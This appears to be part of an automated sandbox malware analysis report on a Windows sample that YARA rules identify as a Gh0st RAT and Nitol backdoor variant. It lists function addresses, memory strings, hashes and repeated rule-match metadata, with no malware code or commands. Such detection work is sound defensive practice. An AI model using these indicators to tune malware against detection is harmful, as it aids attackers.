                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A974B4_2_027A974B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027997374_2_02799737
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0271F7D74_2_0271F7D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027B57D64_2_027B57D6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027727C34_2_027727C3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027847834_2_02784783
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A74FE4_2_027A74FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026EB4C44_2_026EB4C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A94914_2_027A9491
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027AA5744_2_027AA574
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A95464_2_027A9546
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026EC5FD4_2_026EC5FD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0275F5AB4_2_0275F5AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0272D5934_2_0272D593
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0278D59B4_2_0278D59B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027AAA514_2_027AAA51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A9AAA4_2_027A9AAA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0278EA8B4_2_0278EA8B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_02798B614_2_02798B61
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027AABFC4_2_027AABFC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A1BDC4_2_027A1BDC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A28374_2_027A2837
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027AC8194_2_027AC819
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027AA8154_2_027AA815
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0279E80D4_2_0279E80D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0237F1324_2_0237F132
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0237D80C4_2_0237D80C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: String function: 02290CE6 appears 50 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: String function: 027324BF appears 39 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: String function: 0047B47C appears 76 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: String function: 0236680D appears 50 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: String function: 00479240 appears 32 times
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000266D000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.0000000002A0E000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521144245.0000000002578000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.000000000233C000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2332288863.000000000061B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiphlpapi.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002B03000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2160765089.0000000002387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000027D7000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.0000000002412000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002C6D000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.000000000077B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiphlpapi.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.0000000002614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2796933858.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002907000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000255D000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.000000000250C000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiphlpapi.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000238F000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.0000000002999000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.00000000025FD000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.0000000002A94000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2884820798.000000000087F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.00000000022AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
